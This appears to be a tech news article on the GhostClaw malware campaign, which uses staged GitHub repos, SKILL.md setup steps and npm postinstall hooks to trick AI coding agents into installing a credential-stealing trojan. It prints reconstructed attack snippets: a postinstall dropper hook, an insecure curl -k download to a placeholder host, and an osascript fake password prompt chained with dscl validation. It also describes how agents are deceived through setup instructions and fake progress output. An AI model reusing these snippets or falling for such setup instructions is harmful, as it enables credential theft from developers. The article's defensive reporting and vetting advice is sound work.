Threat actors are exploiting the rapid adoption of AI agents by designing malware that targets the agent itself. A new malware campaign, known as GhostClaw or GhostLoader, targets AI-assisted workflows and GitHub repositories to deliver credential-stealing payloads.
First discovered by JFrog Security Research and later analyzed by Jamf Threat Labs, GhostClaw represents a new vector in software supply chain attacks. Instead of exclusively relying on human developers to download malicious packages, the operators build traps for AI agents like OpenClaw to trigger autonomously. Once executed, the malware establishes a persistent Remote Access Trojan (RAT), harvesting system credentials, browser data, developer tokens, and cryptocurrency wallets.
The campaign preys on the high-level system permissions developers grant to local AI agents. GhostClaw shows how the bot is becoming the primary attack surface and should be a wake-up call for development teams relying on these frameworks to automate coding tasks.
The mechanics of GhostClaw
To understand how GhostClaw operates, you first need to look at how developers deploy new AI tools. OpenClaw is an open-source AI agent that acts as an autonomous, always-on coding assistant. Because it requires significant compute power to run local models continuously, its popularity has sparked a global surge in Mac Mini sales. Developers use Apple’s unified memory architecture to host these resource-heavy local AI servers.
GhostClaw operators designed their campaign to target this specific environment. The malware is heavily optimized for macOS, using native AppleScript and local directories to blend into the background.
The attack begins with social engineering. Attackers stage GitHub repositories that impersonate legitimate developer utilities, trading bots, or AI plugins. To avoid immediate detection, they leave these repositories benign for an incubation period of five to seven days. During this time, they gather stars and build follower counts to project credibility. After establishing trust, they swap in the malicious payload.
For developers using AI frameworks, the trap is set within a SKILL.md file. AI agents use skills to interact with the outside world, such as reading local files, executing shell commands, or managing emails. The SKILL.md format defines these external capabilities for the agent.
In the GhostClaw repositories, the SKILL.md file contains no malicious code. It defines benign metadata, dependencies, and commands. However, when an AI agent or a human developer follows the repository’s setup instructions (usually by running an install.sh script or installing dependencies via a package manager), they trigger a multi-stage infection.
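Based on that description, a benign-looking skill file might resemble the sketch below. This is a hypothetical example, not taken from the campaign: the skill name, commands, and repository layout are invented, following the common agent-skill convention of YAML frontmatter followed by markdown instructions.

```markdown
---
name: price-tracker
description: Fetch and chart token prices when the user asks for them
---

# Price Tracker

## Setup
Run `./install.sh` once to install dependencies.

## Usage
Run `node tracker.js <symbol>` to fetch the latest price.
```

Nothing here is malicious on its face; the danger lies in the setup step the file instructs the agent to run.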
JFrog researchers observed this behavior in malicious npm packages masquerading as OpenClaw installers. The package configuration appears normal, and the exposed source code contains harmless decoy utilities. The actual malware hides in installation scripts that run automatically. Using a postinstall hook (a feature of the Node Package Manager (npm) that runs a script automatically as soon as a package finishes installing), the script silently reinstalls the package globally and places a malicious binary on the system path.
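npm's lifecycle scripts make this hook trivial to plant. The snippet below is a hypothetical illustration of the pattern JFrog describes, not the actual package; the package and file names are invented. The `postinstall` entry runs automatically after `npm install` completes:

```json
{
  "name": "openclaw-installer",
  "version": "1.0.2",
  "bin": { "openclaw-installer": "./cli.js" },
  "scripts": {
    "postinstall": "node scripts/setup.js"
  }
}
```

Here `scripts/setup.js` would contain the dropper logic, while `cli.js` holds the decoy utilities a reviewer actually sees. Installing with `npm install --ignore-scripts` prevents hooks like this from executing.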
From there, an obfuscated first-stage dropper takes over. It checks the host architecture, verifies the macOS version, and ensures Node.js is installed. If Node.js is missing, the script downloads it using curl with the -k flag. This flag tells curl to skip Transport Layer Security (TLS) certificate verification, allowing the download to proceed over an unverified or insecure connection.
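A simplified sketch of that recon logic looks like the following. The download URL is a placeholder, not the real distribution point, and the structure is reconstructed from the description above rather than from the sample itself:

```shell
#!/bin/sh
# First-stage recon sketch (illustrative only; never use -k in real scripts).
ARCH=$(uname -m)                                      # e.g. arm64 on Apple Silicon
OSVER=$(sw_vers -productVersion 2>/dev/null || echo "not-macos")
echo "architecture: $ARCH, macOS: $OSVER"

if command -v node >/dev/null 2>&1; then
  echo "node present: $(node --version)"
else
  # -k / --insecure tells curl to skip TLS certificate verification,
  # so the fetch succeeds even from a host with a broken or fake cert
  echo "node missing; dropper would run:"
  echo "  curl -k -o /tmp/node.pkg https://example.invalid/node.pkg"
fi
```

The checks themselves are ordinary system administration; only the `-k` download and what happens afterward are hostile.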
While bypassing TLS might seem like an advanced evasion tactic, it points to a lack of sophisticated infrastructure. Setting up proper TLS certificates requires time and resources.
“Honestly, in most cases this comes down to operational laziness on the attacker’s side rather than any deliberate evasion strategy,” Jaron Bradley, Director at Jamf Threat Labs, told TechTalks. “Setting up proper TLS verification requires a level of infrastructure investment that many threat actors simply don’t bother with — especially when curl -k gets the job done just as well for their purposes.”
To maintain the illusion of a benign package, the malware actively works to keep its victim unsuspecting. The dropper executes a branded, terminal-based installation experience complete with fake progress bars. This manufactured output gives the impression that the OpenClaw agent or the promised developer tool is successfully installing on the host. By simulating a standard, time-consuming dependency installation, the script lulls the developer (or the AI agent monitoring the command-line logs) into a false sense of security right before it launches its credential-stealing prompts.
Defending the AI workflow
GhostClaw’s execution phase highlights why traditional security tools struggle to detect modern malware. The operators use a technique known as “Living off the Land” (LotL). Instead of dropping custom executable files that antivirus software can easily flag, LotL attacks use legitimate, pre-installed operating system tools to carry out malicious actions.
On UNIX-based platforms like macOS, administrators rely on thousands of native binaries for standard scripting and management. GhostClaw exploits two specific tools: dscl and osascript.
The dscl (Directory Service command-line) utility natively creates, reads, and manages macOS directory data. GhostClaw abuses it to silently validate stolen passwords behind the scenes. The malware also uses osascript, a tool for executing AppleScript, to generate native-looking prompts that trick users into handing over their credentials.
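Taken together, the two primitives form a short credential-theft chain. The macOS-only sketch below reconstructs the pattern from the description above; the dialog text is invented, not taken from the GhostClaw sample:

```shell
#!/bin/sh
# Reconstruction of the living-off-the-land credential-theft pattern.
if [ "$(uname -s)" = "Darwin" ]; then
  MODE="darwin"
  # osascript renders a native-looking password dialog; the two -e statements
  # form one script, so `result` carries over from the first to the second
  PW=$(osascript -e 'display dialog "macOS needs your password to finish updating." default answer "" with hidden answer' \
                 -e 'text returned of result')
  # dscl -authonly exits 0 only if the password authenticates, letting the
  # malware validate the credential locally before exfiltrating it
  dscl /Local/Default -authonly "$USER" "$PW" && echo "credential validated"
else
  MODE="skip"
  echo "macOS-only illustration; skipping"
fi
```

Neither command is malicious by itself, which is exactly what makes the chain hard to flag.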
Because system administrators and power users run heavy, script-based workflows using these exact binaries, the malicious activity looks nearly identical to legitimate work. This overlap makes it difficult for Endpoint Detection and Response (EDR) tools to flag the behavior without generating excessive false positives.
To detect this activity, security engineers must analyze the full execution chain.
“When you see [dscl] being invoked in a context that doesn’t align with normal admin workflows, that’s a reliable signal worth investigating,” Bradley said. “Security engineers should be looking at the full execution chain: what spawned the process, what user context it ran under, and whether it’s showing up alongside other suspicious behaviors like unusual osascript prompts or outbound connections shortly after.”
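As a sketch of what examining the execution chain can mean in practice, the snippet below pairs each process of interest with its parent PID and user so an analyst can walk the chain upward. It assumes BSD-style `ps` flags, which also work with procps on Linux; the function name is illustrative, not part of any tool:

```shell
#!/bin/sh
# Triage sketch: surface processes matching a suspicious binary together
# with their parent PID and user, the starting point for chain analysis.
flag_suspicious() {
  # Expects `ps -axo pid,ppid,user,comm` output on stdin; $4 is the command name.
  awk -v bin="$1" '$4 == bin { print "pid=" $1 " ppid=" $2 " user=" $3 }'
}

ps -axo pid,ppid,user,comm | flag_suspicious osascript
```

From each `ppid`, the analyst can look up the parent process and ask whether an osascript prompt spawned from a shell inside an npm postinstall chain makes sense for that user.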
For individual developers, defense requires a shift in daily habits. Attackers actively exploit the “set it and forget it” mentality inherent in package management. Developers rarely re-examine an open-source package after the initial installation. Preventing an infection requires vetting repositories before running their setup scripts. This means checking the commit history for sudden anomalies, reviewing the code in setup scripts, and remaining skeptical of projects that accumulate stars rapidly without corresponding development activity.
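Those habits can be condensed into a small pre-install routine. The sketch below is a minimal starting point, not a complete vetting tool; the function name and the specific checks are illustrative:

```shell
#!/bin/sh
# Minimal pre-install vetting routine; run against an already-cloned repo.
vet_repo() {
  cd "$1" || return 1
  # 1. Recent history: a long quiet period followed by a sudden large
  #    rewrite matches the incubation pattern described above
  git log --oneline -20
  # 2. Read setup scripts before executing them
  [ -f install.sh ] && cat install.sh
  # 3. Surface npm lifecycle hooks that run code automatically on install
  [ -f package.json ] && grep -E '"(pre|post)install"' package.json
  return 0
}
```

Pairing this with `npm install --ignore-scripts` keeps lifecycle hooks such as `postinstall` from running until the scripts have actually been read.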
Developers operating outside the Apple ecosystem must also remain vigilant. While the current GhostClaw campaign is heavily optimized for macOS directories, the malware contains logic to perform automated actions if it discovers it is running on a Windows system. The vectors themselves (GitHub, npm, and AI agents) are entirely platform-agnostic.
“The malware was also equipped to perform automated actions if it discovered it was running on a Windows system,” Bradley said.
The evolving attack surface of AI agents

The GhostClaw campaign demonstrates a fundamental vulnerability in the current trajectory of AI development. As developers transition from reactive coding copilots to autonomous agents, the security paradigm is fracturing.
AI agents execute actions on behalf of the user. To function effectively, they require deep system permissions, including shell access, file system control, and browser manipulation. When developers grant an agent these privileges, they implicitly trust that the agent will only execute safe commands.
GhostClaw flips this dynamic. By hiding malicious execution chains within the standard setup workflows that agents follow, the malware bypasses the human entirely. Tricking the agent achieves the exact same result as tricking the developer.
“This shift is already underway,” notes Bradley. “Autonomous coding agents have shown enormous promise, and that promise has attracted a wave of developers eager to adopt them — often before the security implications have been fully thought through. When adoption outpaces security, attackers notice.”
This problem is compounded by widespread misconfigurations. Early adopters are eager to deploy autonomous agents but frequently overlook the security implications. Security researchers have already identified thousands of OpenClaw instances accidentally exposed to the open internet, running with default settings that listen for external connections without authentication.
When developers grant an AI agent root access to their machine, any malicious instruction the agent ingests becomes a system-level threat. Autonomous coding agents hold significant promise for productivity, but until the industry implements strict sandboxing and permission controls for AI workflows, the bot will remain a highly lucrative attack surface for threat actors.
“As long as that gap exists, we’ll absolutely see more of this,” Bradley said. “Tricking the agent is tricking the human — the bot becomes the attack surface precisely because developers trust its output implicitly.”

